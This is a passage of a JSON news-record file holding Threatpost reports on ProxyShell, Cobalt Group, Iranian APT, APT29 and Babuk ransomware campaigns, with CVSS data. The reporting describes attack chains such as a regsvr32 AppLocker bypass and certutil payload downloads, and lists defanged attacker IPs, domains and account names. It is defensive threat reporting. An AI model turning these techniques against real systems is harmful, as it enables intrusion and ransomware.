vulnerabilities are \u201c\u2026as serious as they come.\u201d He noted that the company did not help matters by failing to allocate CVEs for them until July \u2014 four months after the patches were issued.\n\nIn order of patching priority, according to Beaumont, the vulnerabilities are: [CVE-2021\u201334473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021\u201334523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) and [CVE-2021\u201331207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>).\n\nCVE-2021-34473, a vulnerability in which a pre-auth path confusion leads to ACL Bypass, was patched in April. CVE-2021-34523, also patched in April, is an elevation of privilege on Exchange PowerShell backend. CVE-2021-31207, a bug in which a post-auth Arbitrary-File-Write leads to remote code execution, was patched in May.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-26T12:39:54", "type": "threatpost", "title": "Microsoft Breaks Silence on Barrage of ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-26T12:39:54", "id": "THREATPOST:83C349A256695022C2417F465CEB3BB2", "href": "https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: address that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors are proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** TODAY, Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event**__**!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence &amp; Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-04T16:00:33", "description": "A new-ish threat actor sometimes known as \u201cTortilla\u201d is launching a fresh round of ProxyShell attacks on Microsoft Exchange servers, this time with the aim of inflicting vulnerable servers with variants of the Babuk ransomware.\n\nCisco Talos researchers said in a Wednesday [report](<https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) that they spotted the malicious campaign a few weeks ago, on Oct. 12.\n\nTortilla, an actor that\u2019s been operating since July, is predominantly targeting U.S. victims. It\u2019s also hurling a smaller number of infections that have hit machines in the Brazil, Finland, Germany, Honduras, Thailand, Ukraine and the U.K., as shown on the map below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03120718/ProxShell-Babuk-map-e1635955653968.jpeg>)\n\nVictim distribution map. Source: Cisco Talos.\n\nPrior to this ransomware-inflicting campaign, Tortilla has been experimenting with other payloads, such as the PowerShell-based netcat clone PowerCat.\n\nPowerCat has a penchant for Windows, the researchers explained, being \u201cknown to provide attackers with unauthorized access to Windows machines.\u201d\n\n## ProxyShell\u2019s New Attack Surface\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>)..\n\nIn this latest ProxyShell campaign, Cisco Talos researchers said that the threat actor is using \u201ca somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl\u201d to deliver Babuk.\n\nThey continued: \u201cThe intermediate unpacking stage is downloaded and decoded in memory before the final payload embedded within the original sample is decrypted and executed.\u201d\n\n## Who\u2019s Babuk?\n\nBabuk is a ransomware that\u2019s probably best known for its starring role in a breach of the Washington D.C. police force [in April](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). The gang behind the malware has a short history, having only been [identified in 2021](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>), but that history shows that it\u2019s a [double-extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) player: one that threatens to post stolen data in addition to encrypting files, as a way of applying thumbscrews so victims will pay up.\n\nThat tactic has worked. As [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>) described in February, Babuk the ransomware had already been lobbed at a batch of at least five big enterprises, with one score: The gang walked away with $85,000 after one of those targets ponied up the money, McAfee researchers said.\n\nIts victims have included Serco, an outsourcing firm that confirmed that it had been [slammed](<https://www.computerweekly.com/news/252495684/Serco-confirms-Babuk-ransomware-attack>) with a double-extortion ransomware attack in late January.\n\nLike many ransomware strains, Babuk is ruthless: It not only encrypts a victim\u2019s machine, it also [blows up backups](<https://threatpost.com/conti-ransomware-backups/175114/>) and deletes the volume shadow copies, Cisco Talos said.\n\n## What\u2019s Under Babuk\u2019s Hood\n\nOn the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware and software platforms.\n\nIt\u2019s mostly compiled for Windows and ARM for Linux, but researchers said that, over time, they\u2019ve also seen versions for ESX and a 32-bit, old PE executable.\n\nIn this recent October campaign though, the threat actors are specifically targeting Windows.\n\n## China Chopper Chops Again\n\nPart of the infection chain involves China Chopper: A webshell that dates back to 2010 but which has [clung to relevancy since](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), including reportedly being used in a massive 2019 attack against telecommunications providers called [Operation Soft Cell](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>). The webshell enables attackers to \u201cretain access to an infected system using a client-side application which contains all the logic required to control the target,\u201d as Cisco Talos [described](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) the webshell in 2019.\n\nThis time around, it\u2019s being used to get to Exchange Server systems. \u201cWe assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,\u201d according to the Cisco Talos writeup.\n\n## The Infection Chain\n\nAs shown in the infection flow chart below, the actors are using either a DLL or .NET executable to kick things off on the targeted system. \u201cThe initial .NET executable module runs as a child process of w3wp.exe and invokes the command shell to run an obfuscated PowerShell command,\u201d according to Cisco Talos\u2019 report.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03130541/infection-flow-chart-e1635959155173.jpeg>)\n\nInfection flow chart. Source: Cisco Talos.\n\n\u201cThe PowerShell command invokes a web request and downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund and xxxs[.]info, or the IP address 185[.]219[.]52[.]229,\u201d researchers said.\n\n\u201cThe payload loader downloads an intermediate unpacking stage from the PasteBin clone site pastebin.pl,\u201d they continued \u2013 a site that \u201cseems to be unrelated to the popular pastebin.com.\u201d\n\nThey continued: \u201cThe unpacker concatenates the bitmap images embedded in the resource section of the trojan and decrypts the payload into the memory. The payload is injected into the process AddInProcess32 and is used to encrypt files on the victim\u2019s server and all mounted drives.\u201d\n\n## More 